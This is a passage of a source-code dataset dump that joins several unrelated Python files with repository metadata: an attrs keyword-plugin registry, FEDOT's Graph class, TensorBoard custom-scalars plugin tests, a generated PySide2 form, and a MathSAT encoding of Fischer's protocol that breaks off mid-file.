                        and (keyword.name != other_keyword.name)
                    )
                    # Same name registered under two different uuids.
                    uuid_mismatch = (
                        (keyword.uuid != other_keyword.uuid)
                        and (keyword.name == other_keyword.name)
                    )
                    if name_collision or uuid_collision or uuid_mismatch:
                        raise KeywordCollisionError(
                            'Existing: {}, New: {}'.format(
                                other_keyword,
                                keyword,
                            ),
                        )
            self.plugins.append(plugin)

    def register_keywords(self, *keywords):
        """Convenience: wrap loose keywords in an anonymous plugin and register it."""
        plugin = Plugin()
        plugin.register_keywords(*keywords)
        self.register_plugins(plugin)

    @functools.wraps(attr.ib)
    def create_attribute(self, *args, **kwargs):
        """attr.ib() wrapper that diverts registered extra keywords into metadata."""
        extra_names = set(kwargs.keys()) - set(attr_ib_keywords)
        unknown_names = (
            extra_names - {keyword.name for keyword in self.keywords()}
        )
        if len(unknown_names) != 0:
            raise UnknownKeywordError(
                ', '.join(repr(name) for name in unknown_names),
            )
        # Stash the extras under metadata[metadata_name], preserving any
        # metadata the caller already supplied.
        metadata = kwargs.setdefault('metadata', {})
        exttrs_metadata = metadata.setdefault(metadata_name, {})
        extras = {
            k: v
            for k, v in kwargs.items()
            if k in extra_names
        }
        exttrs_metadata.update(extras)
        # Forward only the genuine attr.ib() keywords.
        basics = collections.OrderedDict(
            (k, v)
            for k, v in kwargs.items()
            if k in attr_ib_keywords
        )
        return attr.ib(*args, **basics)

    def keywords(self):
        """Return the set of all keywords across every registered plugin."""
        return set(itertools.chain.from_iterable(
            (
                keyword
                for keyword in plugin.keywords
            )
            for plugin in self.plugins
        ))
| 25.280576 | 73 | 0.549516 |
2ccaf3b1e614236ab4e765321b502eac766e36d8 | 3,101 | py | Python | fedot/core/dag/graph.py | rozlana-g/FEDOT | a909d6c0ef481cc1cf7a5f10f7b1292d8d2def5c | [
"BSD-3-Clause"
] | 358 | 2020-06-11T09:34:53.000Z | 2022-03-31T12:56:22.000Z | fedot/core/dag/graph.py | rozlana-g/FEDOT | a909d6c0ef481cc1cf7a5f10f7b1292d8d2def5c | [
"BSD-3-Clause"
] | 467 | 2020-06-11T13:49:45.000Z | 2022-03-31T14:19:48.000Z | fedot/core/dag/graph.py | rozlana-g/FEDOT | a909d6c0ef481cc1cf7a5f10f7b1292d8d2def5c | [
"BSD-3-Clause"
] | 48 | 2020-07-13T14:50:45.000Z | 2022-03-26T09:37:13.000Z | from copy import deepcopy
from typing import List, Optional, TYPE_CHECKING, Union
from uuid import uuid4
from fedot.core.dag.graph_operator import GraphOperator
from fedot.core.visualisation.graph_viz import GraphVisualiser
if TYPE_CHECKING:
from fedot.core.dag.graph_node import GraphNode
class Graph:
    """
    Base class used for the pipeline structure definition

    :param nodes: 'GraphNode' object(s)
    """

    def __init__(self, nodes: Optional[Union['GraphNode', List['GraphNode']]] = None):
        self.uid = str(uuid4())
        self.nodes = []
        self.operator = GraphOperator(self)

        if nodes:
            if isinstance(nodes, list):
                for node in nodes:
                    self.add_node(node)
            else:
                self.add_node(nodes)

    def add_node(self, new_node: 'GraphNode'):
        """
        Add new node to the Pipeline

        :param new_node: new GraphNode object
        """
        self.operator.add_node(new_node)

    def update_node(self, old_node: 'GraphNode', new_node: 'GraphNode'):
        """
        Replace old_node with new one.

        :param old_node: 'GraphNode' object to replace
        :param new_node: 'GraphNode' new object
        """
        self.operator.update_node(old_node, new_node)

    def update_subtree(self, old_subroot: 'GraphNode', new_subroot: 'GraphNode'):
        """
        Replace the subtrees with old and new nodes as subroots

        :param old_subroot: 'GraphNode' object to replace
        :param new_subroot: 'GraphNode' new object
        """
        self.operator.update_subtree(old_subroot, new_subroot)

    def delete_node(self, node: 'GraphNode'):
        """
        Delete chosen node redirecting all its parents to the child.

        :param node: 'GraphNode' object to delete
        """
        self.operator.delete_node(node)

    def delete_subtree(self, subroot: 'GraphNode'):
        """
        Delete the subtree with node as subroot.

        :param subroot: root node of the subtree to remove
        """
        self.operator.delete_subtree(subroot)

    def show(self, path: str = None):
        """Render the graph with the default visualiser (optionally saving to *path*)."""
        GraphVisualiser().visualise(self, path)

    def __eq__(self, other) -> bool:
        return self.operator.is_graph_equal(other)

    def __str__(self):
        return self.operator.graph_description()

    def __repr__(self):
        return self.__str__()

    @property
    def root_node(self):
        roots = self.operator.root_node()
        return roots

    @property
    def length(self) -> int:
        return len(self.nodes)

    @property
    def depth(self) -> int:
        return self.operator.graph_depth()

    def __copy__(self):
        cls = self.__class__
        result = cls.__new__(cls)
        result.__dict__.update(self.__dict__)
        # Bug fix: __init__ stores uid as a str, so keep the copy's fresh
        # uid consistent (previously assigned a raw uuid.UUID object).
        result.uid = str(uuid4())
        return result

    def __deepcopy__(self, memo=None):
        cls = self.__class__
        result = cls.__new__(cls)
        # Bug fix: guard against a direct __deepcopy__() call with no memo
        # (copy.deepcopy always passes one, but the default was unusable).
        if memo is None:
            memo = {}
        memo[id(self)] = result
        for k, v in self.__dict__.items():
            setattr(result, k, deepcopy(v, memo))
        # Same consistency fix as __copy__: uid is always a str.
        result.uid = str(uuid4())
        return result
| 26.965217 | 86 | 0.617543 |
15c74afb25f6da3d8026b02388bee3eb3495881b | 11,796 | py | Python | tensorboard/plugins/custom_scalar/custom_scalars_plugin_test.py | tjgq/tensorboard | 751c961b90183115e4ab0ae3975d50146c0705b9 | [
"Apache-2.0"
] | 7 | 2020-04-04T16:25:42.000Z | 2021-10-02T18:26:56.000Z | tensorboard/plugins/custom_scalar/custom_scalars_plugin_test.py | tjgq/tensorboard | 751c961b90183115e4ab0ae3975d50146c0705b9 | [
"Apache-2.0"
] | 1 | 2021-09-02T14:57:13.000Z | 2021-09-02T14:57:13.000Z | tensorboard/plugins/custom_scalar/custom_scalars_plugin_test.py | tjgq/tensorboard | 751c961b90183115e4ab0ae3975d50146c0705b9 | [
"Apache-2.0"
] | 4 | 2020-08-08T18:08:44.000Z | 2021-05-13T05:22:40.000Z | # -*- coding: utf-8 -*-
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for the Custom Scalars Plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
from google.protobuf import json_format
from tensorboard.backend.event_processing import (
plugin_event_multiplexer as event_multiplexer,
)
from tensorboard.plugins import base_plugin
from tensorboard.plugins.custom_scalar import custom_scalars_plugin
from tensorboard.plugins.custom_scalar import layout_pb2
from tensorboard.plugins.custom_scalar import summary
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.scalar import summary as scalar_summary
from tensorboard.util import test_util
tf.compat.v1.disable_v2_behavior()
class CustomScalarsPluginTest(tf.test.TestCase):
    def __init__(self, *args, **kwargs):
        """Build a logdir with three runs ('foo', 'bar', '.') of layouts and scalars."""
        super(CustomScalarsPluginTest, self).__init__(*args, **kwargs)
        self.logdir = os.path.join(self.get_temp_dir(), "logdir")
        os.makedirs(self.logdir)

        # Layout written to the logdir root ('.') run: a single closed
        # "cross entropy" category.
        self.logdir_layout = layout_pb2.Layout(
            category=[
                layout_pb2.Category(
                    title="cross entropy",
                    chart=[
                        layout_pb2.Chart(
                            title="cross entropy",
                            multiline=layout_pb2.MultilineChartContent(
                                tag=[r"cross entropy"],
                            ),
                        ),
                    ],
                    closed=True,
                )
            ]
        )
        # Layout written to the 'foo' run: three categories, including one
        # that deliberately overlaps with the logdir layout (for merge tests).
        self.foo_layout = layout_pb2.Layout(
            category=[
                layout_pb2.Category(
                    title="mean biases",
                    chart=[
                        layout_pb2.Chart(
                            title="mean layer biases",
                            multiline=layout_pb2.MultilineChartContent(
                                tag=[
                                    r"mean/layer0/biases",
                                    r"mean/layer1/biases",
                                ],
                            ),
                        ),
                    ],
                ),
                layout_pb2.Category(
                    title="std weights",
                    chart=[
                        layout_pb2.Chart(
                            title="stddev layer weights",
                            multiline=layout_pb2.MultilineChartContent(
                                tag=[r"stddev/layer\d+/weights"],
                            ),
                        ),
                    ],
                ),
                # A category with this name is also present in a layout for a
                # different run (the logdir run) and also contains a duplicate chart
                layout_pb2.Category(
                    title="cross entropy",
                    chart=[
                        layout_pb2.Chart(
                            title="cross entropy margin chart",
                            margin=layout_pb2.MarginChartContent(
                                series=[
                                    layout_pb2.MarginChartContent.Series(
                                        value="cross entropy",
                                        lower="cross entropy lower",
                                        upper="cross entropy upper",
                                    ),
                                ],
                            ),
                        ),
                        layout_pb2.Chart(
                            title="cross entropy",
                            multiline=layout_pb2.MultilineChartContent(
                                tag=[r"cross entropy"],
                            ),
                        ),
                    ],
                ),
            ]
        )

        # Generate test data.
        # 'foo': its layout plus 4 steps of "squares" (value = step^2).
        with test_util.FileWriterCache.get(
            os.path.join(self.logdir, "foo")
        ) as writer:
            writer.add_summary(
                test_util.ensure_tb_summary_proto(summary.pb(self.foo_layout))
            )
            for step in range(4):
                writer.add_summary(
                    test_util.ensure_tb_summary_proto(
                        scalar_summary.pb("squares", step * step)
                    ),
                    step,
                )

        # 'bar': 3 steps of "increments" (value = step + 1), no layout.
        with test_util.FileWriterCache.get(
            os.path.join(self.logdir, "bar")
        ) as writer:
            for step in range(3):
                writer.add_summary(
                    test_util.ensure_tb_summary_proto(
                        scalar_summary.pb("increments", step + 1)
                    ),
                    step,
                )

        # The '.' run lacks scalar data but has a layout.
        with test_util.FileWriterCache.get(self.logdir) as writer:
            writer.add_summary(
                test_util.ensure_tb_summary_proto(
                    summary.pb(self.logdir_layout)
                )
            )

        self.plugin = self.createPlugin(self.logdir)
def createPlugin(self, logdir):
    """Build a CustomScalarsPlugin over the event files found under `logdir`.

    A ScalarsPlugin is also instantiated and registered in the shared
    `plugin_name_to_instance` mapping, because the custom scalars plugin
    looks up its sibling scalars plugin through the TBContext.
    """
    multiplexer = event_multiplexer.EventMultiplexer()
    multiplexer.AddRunsFromDirectory(logdir)
    multiplexer.Reload()
    plugin_name_to_instance = {}
    context = base_plugin.TBContext(
        logdir=logdir,
        multiplexer=multiplexer,
        plugin_name_to_instance=plugin_name_to_instance,
    )
    scalars_plugin_instance = scalars_plugin.ScalarsPlugin(context)
    custom_scalars_plugin_instance = custom_scalars_plugin.CustomScalarsPlugin(
        context
    )
    plugin_instances = [
        scalars_plugin_instance,
        custom_scalars_plugin_instance,
    ]
    # Register both plugins so they can find each other via the context.
    for plugin_instance in plugin_instances:
        plugin_name_to_instance[
            plugin_instance.plugin_name
        ] = plugin_instance
    return custom_scalars_plugin_instance
def testDownloadData(self):
    """download_data_impl returns JSON rows of [wall_time, step, value]."""
    body, mime_type = self.plugin.download_data_impl(
        "foo", "squares/scalar_summary", "exp_id", "json"
    )
    self.assertEqual("application/json", mime_type)
    # setUp wrote 4 steps of value = step**2 for the "squares" tag.
    self.assertEqual(4, len(body))
    for step, entry in enumerate(body):
        # The time stamp should be reasonable.
        self.assertGreater(entry[0], 0)
        self.assertEqual(step, entry[1])
        np.testing.assert_allclose(step * step, entry[2])
def testScalars(self):
    """scalars_impl resolves the tag regex and returns matching event rows."""
    body = self.plugin.scalars_impl("bar", "increments", "exp_id")
    self.assertTrue(body["regex_valid"])
    self.assertItemsEqual(
        ["increments/scalar_summary"], list(body["tag_to_events"].keys())
    )
    data = body["tag_to_events"]["increments/scalar_summary"]
    # setUp wrote value = step + 1 at each step for the "increments" tag.
    for step, entry in enumerate(data):
        # The time stamp should be reasonable.
        self.assertGreater(entry[0], 0)
        self.assertEqual(step, entry[1])
        np.testing.assert_allclose(step + 1, entry[2])
def testMergedLayout(self):
    """Layouts from all runs are merged; duplicate categories collapse.

    Both the 'foo' run layout and the logdir-level layout define a
    "cross entropy" category: the merged result must contain that
    category once (charts deduplicated, `closed=True` retained).
    """
    parsed_layout = layout_pb2.Layout()
    json_format.Parse(self.plugin.layout_impl(), parsed_layout)
    correct_layout = layout_pb2.Layout(
        category=[
            # A category with this name is also present in a layout for a
            # different run (the logdir run)
            layout_pb2.Category(
                title="cross entropy",
                chart=[
                    layout_pb2.Chart(
                        title="cross entropy",
                        multiline=layout_pb2.MultilineChartContent(
                            tag=[r"cross entropy"],
                        ),
                    ),
                    layout_pb2.Chart(
                        title="cross entropy margin chart",
                        margin=layout_pb2.MarginChartContent(
                            series=[
                                layout_pb2.MarginChartContent.Series(
                                    value="cross entropy",
                                    lower="cross entropy lower",
                                    upper="cross entropy upper",
                                ),
                            ],
                        ),
                    ),
                ],
                closed=True,
            ),
            layout_pb2.Category(
                title="mean biases",
                chart=[
                    layout_pb2.Chart(
                        title="mean layer biases",
                        multiline=layout_pb2.MultilineChartContent(
                            tag=[
                                r"mean/layer0/biases",
                                r"mean/layer1/biases",
                            ],
                        ),
                    ),
                ],
            ),
            layout_pb2.Category(
                title="std weights",
                chart=[
                    layout_pb2.Chart(
                        title="stddev layer weights",
                        multiline=layout_pb2.MultilineChartContent(
                            tag=[r"stddev/layer\d+/weights"],
                        ),
                    ),
                ],
            ),
        ]
    )
    self.assertProtoEquals(correct_layout, parsed_layout)
def testLayoutFromSingleRun(self):
    """A run directory with exactly one layout returns it verbatim."""
    foo_dir = os.path.join(self.logdir, "foo")
    plugin = self.createPlugin(foo_dir)
    actual = layout_pb2.Layout()
    json_format.Parse(plugin.layout_impl(), actual)
    self.assertProtoEquals(self.foo_layout, actual)
def testNoLayoutFound(self):
    """A run directory without any layout summary yields an empty dict."""
    bar_dir = os.path.join(self.logdir, "bar")
    plugin = self.createPlugin(bar_dir)
    self.assertDictEqual({}, plugin.layout_impl())
def testIsActive(self):
    """Plugin built over the full logdir (layouts + scalar data) is active."""
    self.assertTrue(self.plugin.is_active())
def testIsNotActiveDueToNoLayout(self):
    # The bar directory contains scalar data but no layout.
    local_plugin = self.createPlugin(os.path.join(self.logdir, "bar"))
    self.assertFalse(local_plugin.is_active())
def testIsNotActiveDueToNoScalarsData(self):
    """A layout alone (without any scalar data) keeps the plugin inactive."""
    # Generate a directory with a layout but no scalars data.
    directory = os.path.join(self.logdir, "no_scalars")
    with test_util.FileWriterCache.get(directory) as writer:
        writer.add_summary(
            test_util.ensure_tb_summary_proto(
                summary.pb(self.logdir_layout)
            )
        )
    local_plugin = self.createPlugin(directory)
    self.assertFalse(local_plugin.is_active())
if __name__ == "__main__":
    # Discover and run the tests via TensorFlow's test runner.
    tf.test.main()
| 39.32 | 84 | 0.501017 |
6ba2161b9bf2487a29b44ed5ff791e6ea3de952e | 4,557 | py | Python | pyleecan/GUI/Dialog/DMachineSetup/SMHoleMag/PHoleMUD/Ui_PHoleMUD.py | ajpina/pyleecan | f8d1fce7d108cf443f5767e35d59ff15905fb49f | [
"Apache-2.0"
] | 2 | 2020-08-28T14:54:55.000Z | 2021-03-13T19:34:45.000Z | pyleecan/GUI/Dialog/DMachineSetup/SMHoleMag/PHoleMUD/Ui_PHoleMUD.py | ajpina/pyleecan | f8d1fce7d108cf443f5767e35d59ff15905fb49f | [
"Apache-2.0"
] | null | null | null | pyleecan/GUI/Dialog/DMachineSetup/SMHoleMag/PHoleMUD/Ui_PHoleMUD.py | ajpina/pyleecan | f8d1fce7d108cf443f5767e35d59ff15905fb49f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# File generated according to PHoleMUD.ui
# WARNING! All changes made in this file will be lost!
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from ......GUI.Tools.WPathSelector.WPathSelector import WPathSelector
from ......GUI.Tools.MPLCanvas import MPLCanvas2
from ......GUI.Dialog.DMatLib.WMatSelect.WMatSelect import WMatSelect
from pyleecan.GUI.Resources import pyleecan_rc
class Ui_PHoleMUD(object):
    """Qt Designer generated layout for the PHoleMUD page.

    Machine-generated (see the header warning): edits here are lost on
    the next `pyside2-uic` run; change the .ui file instead.
    """

    def setupUi(self, PHoleMUD):
        """Create and lay out every child widget of the PHoleMUD page."""
        if not PHoleMUD.objectName():
            PHoleMUD.setObjectName(u"PHoleMUD")
        PHoleMUD.resize(740, 440)
        PHoleMUD.setMinimumSize(QSize(740, 440))
        PHoleMUD.setMaximumSize(QSize(16777215, 16777215))
        self.horizontalLayout = QHBoxLayout(PHoleMUD)
        self.horizontalLayout.setObjectName(u"horizontalLayout")
        # Left column: geometry viewer canvas.
        self.w_viewer = MPLCanvas2(PHoleMUD)
        self.w_viewer.setObjectName(u"w_viewer")
        self.horizontalLayout.addWidget(self.w_viewer)
        # Right column: path selector, DXF button, materials, outputs.
        self.verticalLayout_3 = QVBoxLayout()
        self.verticalLayout_3.setObjectName(u"verticalLayout_3")
        self.w_path_json = WPathSelector(PHoleMUD)
        self.w_path_json.setObjectName(u"w_path_json")
        sizePolicy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.w_path_json.sizePolicy().hasHeightForWidth())
        self.w_path_json.setSizePolicy(sizePolicy)
        self.verticalLayout_3.addWidget(self.w_path_json)
        self.b_dxf = QPushButton(PHoleMUD)
        self.b_dxf.setObjectName(u"b_dxf")
        self.verticalLayout_3.addWidget(self.b_dxf)
        self.g_mat = QGroupBox(PHoleMUD)
        self.g_mat.setObjectName(u"g_mat")
        self.g_mat_layout = QVBoxLayout(self.g_mat)
        self.g_mat_layout.setObjectName(u"g_mat_layout")
        self.w_mat_0 = WMatSelect(self.g_mat)
        self.w_mat_0.setObjectName(u"w_mat_0")
        self.w_mat_0.setMinimumSize(QSize(100, 0))
        self.g_mat_layout.addWidget(self.w_mat_0)
        self.verticalLayout_3.addWidget(self.g_mat)
        # Spacer pushes the output group box to the bottom.
        self.verticalSpacer = QSpacerItem(
            20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding
        )
        self.verticalLayout_3.addItem(self.verticalSpacer)
        self.g_output = QGroupBox(PHoleMUD)
        self.g_output.setObjectName(u"g_output")
        self.g_output.setMinimumSize(QSize(200, 0))
        self.verticalLayout = QVBoxLayout(self.g_output)
        self.verticalLayout.setObjectName(u"verticalLayout")
        self.out_slot_surface = QLabel(self.g_output)
        self.out_slot_surface.setObjectName(u"out_slot_surface")
        self.verticalLayout.addWidget(self.out_slot_surface)
        self.out_magnet_surface = QLabel(self.g_output)
        self.out_magnet_surface.setObjectName(u"out_magnet_surface")
        self.verticalLayout.addWidget(self.out_magnet_surface)
        self.out_Rmin = QLabel(self.g_output)
        self.out_Rmin.setObjectName(u"out_Rmin")
        self.verticalLayout.addWidget(self.out_Rmin)
        self.out_Rmax = QLabel(self.g_output)
        self.out_Rmax.setObjectName(u"out_Rmax")
        self.verticalLayout.addWidget(self.out_Rmax)
        self.verticalLayout_3.addWidget(self.g_output)
        self.horizontalLayout.addLayout(self.verticalLayout_3)
        self.retranslateUi(PHoleMUD)
        QMetaObject.connectSlotsByName(PHoleMUD)

    # setupUi

    def retranslateUi(self, PHoleMUD):
        """Set (translatable) display text on all widgets."""
        PHoleMUD.setWindowTitle(QCoreApplication.translate("PHoleMUD", u"Form", None))
        self.b_dxf.setText(
            QCoreApplication.translate("PHoleMUD", u"Define Hole from DXF", None)
        )
        self.g_mat.setTitle(QCoreApplication.translate("PHoleMUD", u"Materials", None))
        self.g_output.setTitle(QCoreApplication.translate("PHoleMUD", u"Output", None))
        self.out_slot_surface.setText(
            QCoreApplication.translate("PHoleMUD", u"Hole full surface : ?", None)
        )
        self.out_magnet_surface.setText(
            QCoreApplication.translate("PHoleMUD", u"Hole magnet surface : ?", None)
        )
        self.out_Rmin.setText(QCoreApplication.translate("PHoleMUD", u"Rmin : ?", None))
        self.out_Rmax.setText(QCoreApplication.translate("PHoleMUD", u"Rmax : ?", None))

    # retranslateUi
| 37.975 | 88 | 0.692341 |
f5f5e6a6f7ec250d676e5fa65b38efd1b9393d1f | 14,309 | py | Python | benchmarks/ltl_timed_transition_system/dynamic_fischer/f3/dynamic_fischer_0026.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 3 | 2021-04-23T23:29:26.000Z | 2022-03-23T10:00:30.000Z | benchmarks/ltl_timed_transition_system/dynamic_fischer/f3/dynamic_fischer_0026.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | null | null | null | benchmarks/ltl_timed_transition_system/dynamic_fischer/f3/dynamic_fischer_0026.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 1 | 2021-11-17T22:02:56.000Z | 2021-11-17T22:02:56.000Z | from collections import Iterable
from itertools import chain
from math import log, ceil
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or, msat_make_iff
from mathsat import msat_make_leq, msat_make_equal, msat_make_true
from mathsat import msat_make_number, msat_make_plus, msat_make_times
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next
# Number of Proc components composed into the model.
num_procs = 26
# Name of the real-valued symbol used for time elapse between states
# (x' = x + delta in each Proc; see also diverging_symbs).
delta_name = "delta"
def decl_consts(menv: msat_env, name: str, c_type) -> tuple:
assert not name.startswith("_"), name
s = msat_declare_function(menv, name, c_type)
s = msat_make_constant(menv, s)
x_s = msat_declare_function(menv, name_next(name), c_type)
x_s = msat_make_constant(menv, x_s)
return s, x_s
def make_enum(menv, v_name: str, enum_size: int):
    """Encode an enum of `enum_size` values over ceil(log2(n)) booleans.

    Returns (b_vars, vals, x_vals):
      - b_vars: list of (current, next) boolean symbol pairs;
      - vals[i] / x_vals[i]: the current/next-state predicate that is true
        exactly when the bit pattern encodes value i.
    """
    bool_type = msat_get_bool_type(menv)
    num_bits = ceil(log(enum_size, 2))
    b_vars = []
    for idx in range(num_bits):
        c_name = "{}{}".format(v_name, idx)
        b_vars.append(tuple(decl_consts(menv, c_name, bool_type)))
    vals = []
    x_vals = []
    for enum_val in range(enum_size):
        # Binary encoding of enum_val, padded to num_bits.
        bit_val = format(enum_val, '0{}b'.format(num_bits))
        assert len(bit_val) == num_bits
        assert all(c in {'0', '1'} for c in bit_val)
        # Bit 0 of the string is the most significant; reverse so index
        # idx of b_vars matches bit idx of the value.
        assign = [b_vars[idx] if c == '1' else
                  (msat_make_not(menv, b_vars[idx][0]),
                   msat_make_not(menv, b_vars[idx][1]))
                  for idx, c in enumerate(reversed(bit_val))]
        pred = assign[0][0]
        x_pred = assign[0][1]
        for it in assign[1:]:
            pred = msat_make_and(menv, pred, it[0])
            x_pred = msat_make_and(menv, x_pred, it[1])
        vals.append(pred)
        x_vals.append(x_pred)
    assert len(vals) == enum_size
    assert len(x_vals) == enum_size
    return b_vars, vals, x_vals
def msat_make_minus(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode arg0 - arg1 as arg0 + (arg1 * -1)."""
    neg_arg1 = msat_make_times(menv, arg1, msat_make_number(menv, "-1"))
    return msat_make_plus(menv, arg0, neg_arg1)
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode arg0 < arg1 as not(arg0 >= arg1)."""
    return msat_make_not(menv, msat_make_geq(menv, arg0, arg1))
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode arg0 >= arg1 by flipping the arguments of <=."""
    return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode arg0 > arg1 as not(arg0 <= arg1)."""
    return msat_make_not(menv, msat_make_leq(menv, arg0, arg1))
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode arg0 -> arg1 as (not arg0) | arg1."""
    return msat_make_or(menv, msat_make_not(menv, arg0), arg1)
def diverging_symbs(menv: msat_env) -> frozenset:
    """Return the set of symbols that must diverge over time (here: delta)."""
    real_type = msat_get_rational_type(menv)
    delta = msat_declare_function(menv, delta_name, real_type)
    delta = msat_make_constant(menv, delta)
    return frozenset([delta])
def check_ltl(menv: msat_env, enc: LTLEncoder) -> (Iterable, msat_term,
                                                  msat_term, msat_term):
    """Build the Fischer-protocol model with `num_procs` processes.

    Returns (curr2next map, init, trans, ltl) where the LTL property is
    F G inc_max_prop.
    """
    assert menv
    assert isinstance(menv, msat_env)
    assert enc
    assert isinstance(enc, LTLEncoder)
    bool_type = msat_get_bool_type(menv)
    real_type = msat_get_rational_type(menv)
    # id ranges over 0..num_procs (extra value = "no owner"); turn over procs.
    id_symbs, ids, x_ids = make_enum(menv, "id", num_procs + 1)
    turn_symbs, turns, x_turns = make_enum(menv, "turn", num_procs)
    proposed = [tuple(decl_consts(menv, "proposed{}".format(i), real_type))
                for i in range(num_procs)]
    x_proposed = [p[1] for p in proposed]
    proposed = [p[0] for p in proposed]
    max_prop, x_max_prop = decl_consts(menv, "max_prop", real_type)
    delta, x_delta = decl_consts(menv, delta_name, real_type)
    inc_max_prop, x_inc_max_prop = decl_consts(menv, "inc_max_prop", bool_type)
    # Frame predicates: id' = id and turn' = turn over the bit encodings.
    same_id = msat_make_iff(menv, id_symbs[0][1], id_symbs[0][0])
    for s, x_s in id_symbs[1:]:
        same_id = msat_make_and(menv, same_id,
                                msat_make_iff(menv, x_s, s))
    same_turn = msat_make_iff(menv, turn_symbs[0][1], turn_symbs[0][0])
    for s, x_s in turn_symbs[1:]:
        same_turn = msat_make_and(menv, same_turn,
                                  msat_make_iff(menv, x_s, s))
    procs = [Proc("p{}".format(i), menv, enc, turns[i],
                  ids[i], x_ids[i], ids[-1], x_ids[-1],
                  proposed[i], x_proposed[i],
                  same_id, max_prop, delta, x_delta)
             for i in range(num_procs)]
    curr2next = {max_prop: x_max_prop, delta: x_delta,
                 inc_max_prop: x_inc_max_prop}
    for s, x_s in chain(id_symbs, turn_symbs):
        assert s not in curr2next
        curr2next[s] = x_s
    for s, x_s in zip(proposed, x_proposed):
        assert s not in curr2next
        curr2next[s] = x_s
    for comp in procs:
        for s, x_s in comp.symb2next.items():
            curr2next[s] = x_s
    # bound id
    bound_id = ids[0]
    for c_id in ids[1:]:
        bound_id = msat_make_or(menv, bound_id, c_id)
    init = bound_id
    bound_id = x_ids[0]
    for x_id in x_ids[1:]:
        bound_id = msat_make_or(menv, bound_id, x_id)
    trans = bound_id
    # bound turn
    bound_turn = turns[0]
    for c_t in turns[1:]:
        bound_turn = msat_make_or(menv, bound_turn, c_t)
    init = msat_make_and(menv, init, bound_turn)
    bound_turn = x_turns[0]
    for x_t in x_turns[1:]:
        bound_turn = msat_make_or(menv, bound_turn, x_t)
    trans = msat_make_and(menv, trans, bound_turn)
    # id = 0 & inc_max_prop
    init = msat_make_and(menv, init, msat_make_and(menv, ids[0], inc_max_prop))
    zero = msat_make_number(menv, "0")
    # delta > 0 -> id' = id & turn' = turn &
    # max_prop' = max_prop
    lhs = msat_make_gt(menv, delta, zero)
    rhs = msat_make_and(menv, msat_make_and(menv, same_id, same_turn),
                        x_inc_max_prop)
    trans = msat_make_and(menv, trans,
                          msat_make_impl(menv, lhs, rhs))
    # invar: delta >= 0
    init = msat_make_and(menv, init, msat_make_geq(menv, delta, zero))
    trans = msat_make_and(menv, trans, msat_make_geq(menv, x_delta, zero))
    # invar: max_prop >= proposed[0] & ...
    for prop, x_prop in zip(proposed, x_proposed):
        init = msat_make_and(menv, init,
                             msat_make_geq(menv, max_prop, prop))
        trans = msat_make_and(menv, trans,
                              msat_make_geq(menv, x_max_prop, x_prop))
    # invar: max_prop = proposed[0] | ...
    init_eqs = msat_make_equal(menv, max_prop, proposed[0])
    trans_eqs = msat_make_equal(menv, x_max_prop, x_proposed[0])
    for p, x_p in zip(proposed[1:], x_proposed[1:]):
        init_eqs = msat_make_or(menv, init_eqs,
                                msat_make_equal(menv, max_prop, p))
        trans_eqs = msat_make_or(menv, trans_eqs,
                                 msat_make_equal(menv, x_max_prop, x_p))
    init = msat_make_and(menv, init, init_eqs)
    trans = msat_make_and(menv, trans, trans_eqs)
    # max_prop' >= max_prop <-> inc_max_prop'
    lhs = msat_make_geq(menv, x_max_prop, max_prop)
    rhs = x_inc_max_prop
    trans = msat_make_and(menv, trans,
                          msat_make_iff(menv, lhs, rhs))
    # Conjoin every process's init/trans constraints.
    for p in procs:
        init = msat_make_and(menv, init, p.init)
        trans = msat_make_and(menv, trans, p.trans)
    # F G inc_max_prop
    ltl = enc.make_F(enc.make_G(inc_max_prop))
    return TermMap(curr2next), init, trans, ltl
class Module:
    """Synchronous component: holds init/trans constraints and its symbols."""

    def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
                 *args, **kwargs):
        self.name = name
        self.menv = menv
        self.enc = enc
        # Maps each current-state symbol to its next-state counterpart.
        self.symb2next = {}
        # Subclasses strengthen these; default is the trivial constraint.
        true = msat_make_true(menv)
        self.init = true
        self.trans = true

    def _symb(self, v_name, v_type):
        """Declare a (current, next) constant pair prefixed by the module name."""
        v_name = "{}_{}".format(self.name, v_name)
        return decl_consts(self.menv, v_name, v_type)

    def _enum(self, v_name: str, enum_size: int):
        """Declare a boolean-encoded enum prefixed by the module name."""
        c_name = "{}_{}".format(self.name, v_name)
        return make_enum(self.menv, c_name, enum_size)
class Proc(Module):
    """P module: one Fischer process with locations idle/wait/req/cs,
    a clock `x` and a `saved_max` snapshot of the global max proposal."""

    def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
